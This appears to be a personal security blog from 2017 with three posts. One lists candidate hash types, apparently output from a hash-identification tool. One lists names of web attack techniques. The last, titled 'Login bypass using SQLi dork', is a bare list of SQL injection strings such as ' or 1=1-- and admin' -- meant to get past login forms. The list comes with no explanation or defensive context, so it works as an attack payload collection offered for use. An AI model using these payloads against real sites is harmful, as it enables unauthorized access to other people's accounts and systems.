Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass))
Swapnil CySec
Saturday, May 6, 2017
Hashes
Saturday, February 18, 2017
Website attack methods
Here is a list of the types of attack on web-based applications:
[~]SQL Injection Attack
[~]Hibernate Query Language Injection
[~]Direct OS Code Injection
[~]XML Entity Injection
[~]Broken Authentication and Session Management
[~]Cross-Site Scripting (XSS)
[~]Insecure Direct Object References
[~]Security Misconfiguration
[~]Sensitive Data Exposure
[~]Missing Function Level Access Control
[~]Cross-Site Request Forgery (CSRF)
[~]Using Components with Known Vulnerabilities
[~]Unvalidated Redirects and Forwards
[~]Cross Site Scripting Attacks
[~]Clickjacking Attacks
[~]DNS Cache Poisoning
[~]Symlinking – An Insider Attack
[~]Cross Site Request Forgery Attacks
[~]Remote Code Execution Attacks
[~]Remote File Inclusion
[~]Local File Inclusion
[~]Evercookie
[~]Denial of Service Attack
[~]Cookie Eviction
[~]phpwn
[~]NAT Pinning
[~]XSHM
[~]MitM DNS Rebinding SSL/TLS Wildcards and XSS
[~]Quick Proxy Detection
[~]Improving HTTPS Side Channel Attacks
[~]Side Channel Attacks in SSL
[~]Turning XSS into Clickjacking
[~]Bypassing CSRF protections with ClickJacking and
[~]HTTP Parameter Pollution
[~]URL Hijacking
[~]Strokejacking
[~]Fooling B64_Encode(Payload) on WAFs and filters
[~]MySQL Stacked Queries with SQL Injection.
[~]Posting raw XML cross-domain
[~]Generic cross-browser cross-domain theft
[~]Attacking HTTPS with Cache Injection
[~]Tapjacking
[~]XSS-Track
[~]Next Generation Clickjacking
[~]XSSing client-side dynamic HTML.
[~]Stroke triggered XSS and StrokeJacking
[~]Lost in Translation
[~]Persistent Cross Interface Attacks
[~]Chronofeit Phishing
[~]SQLi filter evasion cheat sheet (MySQL)
[~]Tabnabbing
[~]UI Redressing
[~]Cookie Poisoning
[~]SSRF
[~]Bruteforce of PHPSESSID
[~]Blended Threats and JavaScript
[~]Cross-Site Port Attacks
[~]CAPTCHA Re-Riding Attack
Source: Blogs & FB Pages
Note: Add more if I missed any 😊
Thursday, February 16, 2017
Login bypass using SQLi dork
x' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
or '1'='1
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1